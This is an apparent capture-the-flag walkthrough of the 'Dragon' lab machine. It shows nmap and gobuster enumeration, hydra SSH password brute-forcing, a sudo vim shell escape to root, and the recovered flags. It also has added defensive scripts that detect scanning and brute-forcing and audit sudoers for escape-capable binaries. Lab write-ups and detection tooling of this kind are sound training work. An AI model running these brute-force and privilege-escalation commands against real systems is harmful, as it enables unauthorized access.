Dragon

Target description

I. Information Gathering

1. Host discovery

┌──(root㉿kali)-[~]
└─# nmap -sn 192.168.2.0/24
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-08-20 10:47 CST
Nmap scan report for 192.168.2.1
Host is up (0.00034s latency).
MAC Address: 0A:00:27:00:00:0A (Unknown)
Nmap scan report for 192.168.2.2
Host is up (0.00028s latency).
MAC Address: 08:00:27:4F:8B:03 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.67
Host is up (0.00070s latency).
MAC Address: 08:00:27:93:AF:C2 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.4
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.05 seconds

Target IP: 192.168.2.67

2. Port scanning

1. Full port scan

┌──(root㉿kali)-[~]
└─# nmap --min-rate 10000 -p- 192.168.2.67
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-08-20 10:47 CST
Nmap scan report for 192.168.2.67
Host is up (0.0014s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:93:AF:C2 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 3.43 seconds

Open ports: 22, 80

2. Service and version scan

┌──(root㉿kali)-[~]
└─# nmap --min-rate 10000 -sT -sV -sC -O -p22,80 192.168.2.67
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-08-20 10:47 CST
Nmap scan report for 192.168.2.67
Host is up (0.0011s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.6p1 Ubuntu 3ubuntu13.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 3e:98:c6:f1:55:e6:30:8b:83:c4:69:60:d9:ed:11:4d (ECDSA)
|_ 256 b5:d2:46:75:32:b0:98:b2:8f:61:02:95:cf:ba:19:c6 (ED25519)
80/tcp open http Apache httpd 2.4.58 ((Ubuntu))
|_http-title: La M\xC3\xA1quina del Drag\xC3\xB3n
|_http-server-header: Apache/2.4.58 (Ubuntu)
MAC Address: 08:00:27:93:AF:C2 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.95 seconds

1. Port 22: SSH, OpenSSH 9.6p1
2. Port 80: HTTP, Apache httpd 2.4.58

3. UDP port scan

┌──(root㉿kali)-[~]
└─# nmap -sU --top-ports 100 192.168.2.67
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-08-20 11:10 CST
Nmap scan report for 192.168.2.67
Host is up (0.00089s latency).
All 100 scanned ports on 192.168.2.67 are in ignored states.
Not shown: 56 closed udp ports (port-unreach), 44 open|filtered udp ports (no-response)
MAC Address: 08:00:27:93:AF:C2 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 54.03 seconds

No open UDP ports found

4. Vulnerability script scan

┌──(root㉿kali)-[~]
└─# nmap --script=vuln -p22,80 192.168.2.67
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-08-20 10:48 CST
Nmap scan report for 192.168.2.67
Host is up (0.00080s latency).

PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
|_ /secret/: Potentially interesting folder
MAC Address: 08:00:27:93:AF:C2 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 31.45 seconds

A directory /secret was found under port 80

3. Web directory scanning

┌──(root㉿kali)-[~]
└─# gobuster dir -u http://192.168.2.67 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php,txt,html,bak,md,db,js
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.2.67
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: bak,md,db,js,php,txt,html
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.html (Status: 403) [Size: 277]
/index.html (Status: 200) [Size: 981]
/secret (Status: 301) [Size: 313] [--> http://192.168.2.67/secret/]
/.html (Status: 403) [Size: 277]
/server-status (Status: 403) [Size: 277]
Progress: 1764480 / 1764488 (100.00%)
===============================================================
Finished
===============================================================

The /secret directory shows up here as well
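From the defender's side, a gobuster run like the one above leaves a very recognisable trace in the Apache access log: one client requesting hundreds of distinct paths, most of them answered with 404 or 403, and (unless the scanner changes it) a User-Agent of gobuster/3.6, the same one Gobuster prints in its banner. The script below is an added example, not part of the original writeup; it parses combined-format access log lines and flags clients that match that pattern. The log lines, the scanner IP 192.168.2.4 and the paths are constructed for the example, and the thresholds are assumptions to tune per site.

```python
"""Detect directory brute-forcing (e.g. gobuster) in Apache access logs.

Added example, not part of the original writeup. The log lines below are
constructed; the scanner IP 192.168.2.4 and the paths are assumptions.
"""
import re
from collections import defaultdict

# Apache "combined" log format (the default for access.log on Ubuntu).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Constructed sample log lines (not captured from the target).
SAMPLE_LOG = """\
192.168.2.10 - - [20/Aug/2025:10:40:01 +0800] "GET / HTTP/1.1" 200 981 "-" "Mozilla/5.0"
192.168.2.10 - - [20/Aug/2025:10:40:05 +0800] "GET /secret/ HTTP/1.1" 200 313 "-" "Mozilla/5.0"
192.168.2.4 - - [20/Aug/2025:10:50:00 +0800] "GET /.html HTTP/1.1" 403 277 "-" "gobuster/3.6"
192.168.2.4 - - [20/Aug/2025:10:50:00 +0800] "GET /admin HTTP/1.1" 404 273 "-" "gobuster/3.6"
192.168.2.4 - - [20/Aug/2025:10:50:00 +0800] "GET /admin.php HTTP/1.1" 404 273 "-" "gobuster/3.6"
192.168.2.4 - - [20/Aug/2025:10:50:01 +0800] "GET /backup.bak HTTP/1.1" 404 273 "-" "gobuster/3.6"
192.168.2.4 - - [20/Aug/2025:10:50:01 +0800] "GET /secret HTTP/1.1" 301 313 "-" "gobuster/3.6"
192.168.2.4 - - [20/Aug/2025:10:50:01 +0800] "GET /test.txt HTTP/1.1" 404 273 "-" "gobuster/3.6"
192.168.2.4 - - [20/Aug/2025:10:50:02 +0800] "GET /server-status HTTP/1.1" 403 277 "-" "gobuster/3.6"
"""

# User-Agent prefixes of common directory scanners (lower-case).
SCANNER_UA = ("gobuster", "dirbuster", "ffuf", "nikto", "dirb")


def parse_log(text):
    """Yield one dict per well-formed combined-format line; skip the rest."""
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            yield m.groupdict()


def detect_dir_bruteforce(text, max_not_found=5, min_distinct_paths=5):
    """Return {ip: reasons} for clients that look like directory brute-forcers.

    Reasons: 'not_found_burst' (many 403/404 answers across distinct paths) and
    'scanner_ua' (a known scanner User-Agent). Thresholds are assumptions.
    """
    per_ip = defaultdict(lambda: {"not_found": 0, "paths": set(), "uas": set()})
    for rec in parse_log(text):
        stats = per_ip[rec["ip"]]
        stats["paths"].add(rec["path"])
        stats["uas"].add(rec["ua"].lower())
        if rec["status"] in ("403", "404"):
            stats["not_found"] += 1

    findings = {}
    for ip, stats in per_ip.items():
        reasons = []
        if stats["not_found"] >= max_not_found and len(stats["paths"]) >= min_distinct_paths:
            reasons.append("not_found_burst")
        if any(ua.startswith(SCANNER_UA) for ua in stats["uas"]):
            reasons.append("scanner_ua")
        if reasons:
            findings[ip] = reasons
    return findings


if __name__ == "__main__":
    for ip, reasons in detect_dir_bruteforce(SAMPLE_LOG).items():
        print(f"{ip}: {', '.join(reasons)}")
```

The 403/404 burst is the signal worth alerting on; the User-Agent check is only a convenience, since a scanner can set any User-Agent it likes.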

II. Vulnerability Testing

1. Web (port 80) penetration

Browsing port 80 reveals nothing useful

Browsing /secret, the hints there suggest that the SSH login username is dragon

2. SSH password guessing

Password guessing with hydra

┌──(root㉿kali)-[~]
└─# hydra -t 64 -l dragon -P /usr/share/wordlists/rockyou.txt ssh://192.168.2.67 -F -I
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-08-20 11:16:49
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 64 tasks per 1 server, overall 64 tasks, 14344399 login tries (l:1/p:14344399), ~224132 tries per task
[DATA] attacking ssh://192.168.2.67:22/
[22][ssh] host: 192.168.2.67 login: dragon password: shadow
[STATUS] attack finished for 192.168.2.67 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-08-20 11:16:58

SSH credentials found: login: dragon password: shadow
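The hydra run above (64 parallel tasks against rockyou.txt) generates thousands of "Failed password" entries in sshd's auth log within seconds, followed by an "Accepted password" from the same source once the valid pair is found. The script below is an added example, not part of the original writeup; it detects that burst with a sliding window over the timestamps and records whether a successful login from the same source followed it, which is the case that matters most for incident response. The log lines are constructed (the hostname follows the page's session, the attacker IP 192.168.2.4 and the year are assumptions).

```python
"""Detect SSH password brute-forcing in sshd auth logs.

Added example, not part of the original writeup. The log lines are constructed;
the hostname follows the page, the source IP 192.168.2.4 is an assumption.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Syslog-style sshd lines as written to /var/log/auth.log on Ubuntu.
FAILED_RE = re.compile(
    r'^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: '
    r'Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+'
)
ACCEPTED_RE = re.compile(
    r'^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: '
    r'Accepted (?:password|publickey) for (?P<user>\S+) from (?P<ip>\S+) port \d+'
)

YEAR = 2025  # syslog timestamps carry no year; assumed for the constructed sample


def _parse_ts(s):
    return datetime.strptime(f"{YEAR} {s}", "%Y %b %d %H:%M:%S")


# Constructed sample: 12 failures in three seconds from one source, then a
# success from that source, plus one benign failed login from another host.
SAMPLE_AUTH_LOG = "\n".join(
    [f"Aug 20 11:16:{50 + i // 4:02d} TheHackersLabs-Dragon sshd[{1200 + i}]: "
     f"Failed password for dragon from 192.168.2.4 port {50000 + i} ssh2"
     for i in range(12)]
    + ["Aug 20 11:16:58 TheHackersLabs-Dragon sshd[1300]: "
       "Accepted password for dragon from 192.168.2.4 port 50100 ssh2",
       "Aug 20 11:20:03 TheHackersLabs-Dragon sshd[1400]: "
       "Failed password for dragon from 192.168.2.10 port 40001 ssh2"]
)


def detect_ssh_bruteforce(text, window=timedelta(minutes=1), threshold=10):
    """Return {ip: finding} for sources with >= threshold failed logins inside
    any sliding window of length `window`. The finding lists the targeted
    users and whether a successful login from that IP followed the burst."""
    failures = defaultdict(list)   # ip -> [(ts, user)]
    successes = defaultdict(list)  # ip -> [(ts, user)]
    for line in text.splitlines():
        if (m := FAILED_RE.match(line)):
            failures[m["ip"]].append((_parse_ts(m["ts"]), m["user"]))
        elif (m := ACCEPTED_RE.match(line)):
            successes[m["ip"]].append((_parse_ts(m["ts"]), m["user"]))

    findings = {}
    for ip, events in failures.items():
        events.sort()
        times = [t for t, _ in events]
        start = 0
        for end in range(len(times)):
            # Shrink the window from the left until it spans at most `window`.
            while times[end] - times[start] > window:
                start += 1
            if end - start + 1 >= threshold:
                burst_end = times[end]
                findings[ip] = {
                    "failures": len(events),
                    "users": sorted({u for _, u in events}),
                    "success_after_burst": any(
                        t >= burst_end for t, _ in successes.get(ip, [])),
                }
                break
    return findings


if __name__ == "__main__":
    for ip, finding in detect_ssh_bruteforce(SAMPLE_AUTH_LOG).items():
        print(ip, finding)
```

A finding with success_after_burst set is the one to treat as a likely compromise rather than just noise; the mitigations on the target side are the usual ones (key-only authentication, fail2ban or equivalent rate limiting, and not reusing dictionary passwords).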

3. Obtaining a shell as dragon

Log in directly with the obtained credentials

┌──(root㉿kali)-[~]
└─# ssh dragon@192.168.2.67
dragon@192.168.2.67's password:
Welcome to Ubuntu 24.04.2 LTS (GNU/Linux 6.8.0-71-generic x86_64)
Last login: Tue Aug 5 08:13:55 2025 from 192.168.18.16
dragon@TheHackersLabs-Dragon:~$ id
uid=1000(dragon) gid=1000(dragon) groups=1000(dragon),24(cdrom),30(dip),46(plugdev),101(lxd)

III. Privilege Escalation

Obtaining root

Check the current user's entries in /etc/sudoers, i.e. which commands the user is allowed to run with sudo

dragon@TheHackersLabs-Dragon:~$ sudo -l
Matching Defaults entries for dragon on TheHackersLabs-Dragon:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User dragon may run the following commands on TheHackersLabs-Dragon:
(ALL) NOPASSWD: /usr/bin/vim

sudo vim privilege escalation

/usr/bin/vim can be run via sudo as any user without a password.
It can be exploited directly with one of the following commands:

sudo vim -c ':!/bin/sh'
sudo vim -c ':py import os; os.execl("/bin/sh", "sh", "-c", "reset; exec sh")'
sudo vim -c ':lua os.execute("reset; exec sh")'

Root obtained

dragon@TheHackersLabs-Dragon:~$ sudo /usr/bin/vim -c ':!/bin/sh'
# id
uid=0(root) gid=0(root) groups=0(root)
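The root cause here is a sudoers rule that hands root to an editor, and vim is far from the only binary with a built-in way to run commands (less, find, awk, tar and rsync are other common ones). The script below is an added example, not part of the original writeup: a small sudoers auditor that parses user-spec lines, flags commands that can escape to a shell, notes whether NOPASSWD or NOEXEC is set, and suggests sudoedit for editor rules, which is the usual fix when the intent was only to let the user edit a specific file as root. The sudoers fragment is constructed; only the dragon/vim rule mirrors the page's sudo -l output, and the list of escape-capable binaries is a short, well-known subset rather than a complete one.

```python
"""Audit sudoers rules for commands that allow a shell escape (the sudo vim case).

Added example, not part of the original writeup. The sudoers lines are
constructed; only the dragon/vim rule mirrors the page's `sudo -l` output.
"""
import os
import re

# Binaries that can run arbitrary commands once started as root (a short,
# well-known subset; a real auditor would load the full GTFOBins list).
SHELL_ESCAPE_BINS = {
    "vim", "vi", "nano", "less", "more", "man", "find", "awk", "perl",
    "python3", "env", "bash", "sh", "tar", "rsync",
}
EDITORS = {"vim", "vi", "nano"}

# user  host=(runas) [TAG: ...] cmd[, cmd...]
RULE_RE = re.compile(
    r'^(?P<who>\S+)\s+(?P<host>\S+)\s*=\s*\((?P<runas>[^)]*)\)\s*'
    r'(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$'
)

# Constructed sample /etc/sudoers fragment (not taken from the target).
SAMPLE_SUDOERS = """\
# constructed sample
Defaults env_reset, use_pty
dragon ALL=(ALL) NOPASSWD: /usr/bin/vim
deploy ALL=(root) NOEXEC: /usr/bin/less /var/log/syslog
backup ALL=(root) /usr/bin/rsync, /usr/bin/tar
ops ALL=(root) NOPASSWD: /usr/bin/systemctl restart apache2
"""

SKIP_PREFIXES = ("#", "Defaults", "Cmnd_Alias", "User_Alias", "Host_Alias", "Runas_Alias")


def parse_rules(text):
    """Yield (who, runas, tags, cmd) for each command in each user-spec line;
    comments, Defaults and alias definitions are skipped."""
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith(SKIP_PREFIXES):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        tags = {t.rstrip(":") for t in m["tags"].split()}
        for cmd in m["cmds"].split(","):
            yield m["who"], m["runas"], tags, cmd.strip()


def audit_sudoers(text):
    """Return one finding per rule/command with a severity, the reason and,
    for editors, the recommended replacement."""
    findings = []
    for who, runas, tags, cmd in parse_rules(text):
        binary = os.path.basename(cmd.split()[0])
        nopasswd = "NOPASSWD" in tags
        if cmd == "ALL":
            severity, reason = "high", f"any command as {runas}"
        elif binary in SHELL_ESCAPE_BINS and "NOEXEC" not in tags:
            severity, reason = "high", f"{binary} can spawn a shell as {runas}"
        elif binary in SHELL_ESCAPE_BINS:
            severity, reason = "medium", f"{binary} is escape-capable; NOEXEC blocks exec-based escapes only"
        else:
            severity, reason = "info", "fixed command"
        fix = f"use 'sudoedit <file>' instead of {binary}" if binary in EDITORS else None
        findings.append({"who": who, "cmd": cmd, "severity": severity,
                         "nopasswd": nopasswd, "reason": reason, "fix": fix})
    return findings


if __name__ == "__main__":
    for f in audit_sudoers(SAMPLE_SUDOERS):
        flag = " NOPASSWD" if f["nopasswd"] else ""
        print(f"[{f['severity']}] {f['who']}: {f['cmd']}{flag} - {f['reason']}"
              + (f" (fix: {f['fix']})" if f["fix"] else ""))
```

Note that NOPASSWD is reported but does not change the severity: a rule that lets a user reach a root shell is a full compromise whether or not the user's own password is asked for first.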

IV. Getting the Flags

# cat /home/dragon/user.txt /root/root.txt
e1f9c2e8a1d8477f9b3f6cd298f9f3bd
7a4d1b35eebf4aefa5f1b0198b0d6c17

Dragon
http://miao-sec.github.io/Thehackerslabs/Dragon/
Author: Miao
Published: August 20, 2025
License: BY-MIAO